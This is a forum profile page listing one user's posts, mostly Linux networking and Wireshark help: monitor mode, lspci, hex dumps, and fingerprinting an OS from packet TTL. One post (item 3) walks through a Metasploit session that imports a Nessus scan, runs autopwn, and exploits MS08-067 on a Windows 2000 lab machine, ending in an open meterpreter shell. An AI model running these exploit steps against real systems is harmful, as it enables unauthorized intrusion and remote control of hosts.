rocky

Members
  • Content count

    19
  • Joined

  • Last visited

Community Reputation

1 Neutral

About rocky

  • Rank
    I broke 10 posts and all I got was this lousy title!
  • Birthday 09/25/1981

Profile Information

  • Location
    California
  1. Try the following command: iwconfig [interface] mode monitor This command will put your wireless interface into RFMON mode. Please read: http://wiki.wireshark.org/CaptureSetup/WLAN
  2. I recommend using VMWare Server - which is free to download and install - for running Linux. This way during the course of your learning any mistakes you may make will only affect the virtual machine. You may find that in the future you will want to use Linux as your main operating system but in the mean time however if your goal is to simply learn Linux while still retaining the functionality of Windows give the virtualization method a shot. VMWare is fairly straight forward to install and to use as well. An added bonus will be learning two new skills -- always a plus! http://www.vmware.com/
  3. For finding vulnerabilities I would checkout Nessus or SAINT. What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit making the process much more automated. autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box. msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db msf > db_import_nessus_nbe /root/nessus1026.nbe msf > db_services [*] Time: 2009-11-26 15:33:20 -0800 Service: host=192.168.1.107 port=139 proto=tcp state=up name=netbios-ssn [snip] [*] Time: 2009-11-26 15:33:23 -0800 Service: host=192.168.1.107 port=135 proto=udp state=up name=epmap msf > db_vulns [*] Time: 2009-11-26 15:33:20 -0800 Vuln: host=192.168.1.107 port=139 proto=tcp name=NSS-11011 refs= [snip] [*] Time: 2009-11-26 15:33:25 -0800 Vuln: host=192.168.1.107 port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074 msf > db_autopwn -p -t -e A more manual exploit against a Windows 2000 Server pansy box. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107 RHOST => 192.168.1.107 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.1.112 LHOST => 192.168.1.112 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English [*] Selected Target: Windows 2000 Universal [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.112:46190 -> 192.168.1.107:4444) meterpreter >
  4. I believe that this Slackware networking tutorial will answer your question about wpa_supplicant and WPA2: http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:network
  5. In fact lspci -k will show the kernel modules.
  6. You need the -v switch for lspci to show you which module is in use. lspci -v If you use the verbose switch you get more detailed information about each PCI device, but the same devices are displayed regardless if the switch is present.
  7. lspci might be the command you're looking for.
  8. Dial Tone, Cool man I can respect that. Try this: First you have to format the hex data you have to the format that text2pcap wants: 000000 00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18 000010 00 47 30 7d 00 00 ff 11 07 5e c0 a8 01 61 c0 a8 000020 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01 000030 00 00 00 00 00 00 02 39 37 01 31 03 31 36 38 03 000040 31 39 32 07 69 6e 2d 61 64 64 72 04 61 72 70 61 000050 00 00 0c 00 01 next use text2pcap on the file you have saved this data into. Try that; it totally worked for me, I was able to open the file in wireshark and everything.
  9. Hi Dirk Chesnut, Not really knowing much about rkhunter, I actually went and downloaded rkhunter and ran it and it must do some sort of generic profiling which then is compared to the current state of your system, because I got some errors, mostly innocuous ones though. After that it must store information of the last known state, being the last time it was run, into the /var/lib/rkhunter directory in a file called db, which I'm assuming is for database. Now I'm parroting you, however that is what I meant by database in my previous post, a file that contains the profile of your local machine of the last known state which is then compared against the current state when you run rkhunter, which is bound to produce false positives. Good post by the way.
  10. I think his professor is trying to get him to take an IP packet, analyze the data, then deduce what operating system it came from. It's already in hex and only the data portion would produce useful information from an ascii conversion. 00 1a 70 fb f7 77 00 13 02 a9 97 97 08 00 45 00 00 45 c7 98 00 00 80 11 25 f9 c0 a8 01 65 4a dc 40 2d d6 08 00 35 00 31 d0 9e 1c 86 01 00 00 01 00 00 00 00 00 00 03 77 77 77 0f 74 68 65 66 65 64 6f 72 61 6c 6f 75 6e 67 65 03 63 6f 6d 00 00 01 00 01 Above is a DNS request from a Windows XP laptop I have to the DNS server of my ISP that I took directly from Wireshark. The TTL is 0x80 or 128, which is a clear indicator that's it's a Windows machine. I think in the above case, the hex data that Dial Tone posted, it was just a matter of fingerprinting by determining the TTL.
  11. I've never used rkhunter but it appears to use a database and then does a comparison of the database against the current state of your system. I wouldn't be too worried about the inode number change. You said that you updated your system? That is most likely the culprit.
  12. Here's what I found from analyzing the information: 000fdbcb066a000393ed1d830800[iP packet]4518 0047307d0000ff[TTL]11[udp]075ec0a80161[source address]c0a80 101[destination address]14e9[source port]0035[destination port]003396ce4c24010000010 00000000000023937013103313638033 1393207696e2d6164647204617270610 00[data]00c0001 List of TTL by operating system: http://members.cox.net/~ndav1/self_published/TTL_values.html
  13. Now I'm probably wrong but here's what I got: IP packet Unix like operating system UDP source address 192.168.1.197 destination address 192.168.1.1 source port 5353 destination port 53/DNS Here's what the data portion says: ?97?1?168?192?in-addr?arpa??
  14. The opposite: I have text data I want to be hex. Think of it as if in programming, you stored "12345" as a string instead of an integer. Cool, so you if have a text file use xxd as a previous poster noted(sorry for being overzealous). But because I'm kind of thick skulled, is this what you're aiming for? $ cat file.txt This is example text. $ xxd file.txt file.out $ cat file.out 0000000: 5468 6973 2069 7320 6578 616d 706c 6520 This is example 0000010: 7465 7874 2e0a text..
  15. Are you trying to save data from wireshark? If so use the export function, and if you're just looking to save a frame or less use the export Selected Packet Bytes in File > Export > Selected Packet Bytes, after you have this saved it will be a binary file so as a previous poster suggested use xxd to get a hex dump to standard out or use redirection to save the output of the xxd hex dump into a text file. I think this is what you're asking, if not my apologies. EDIT: Also there is usually a hexdump command, using no flags, on most Linux installs that will give you just hex, no ascii, which I think is pretty much the same output of od -x <filename>.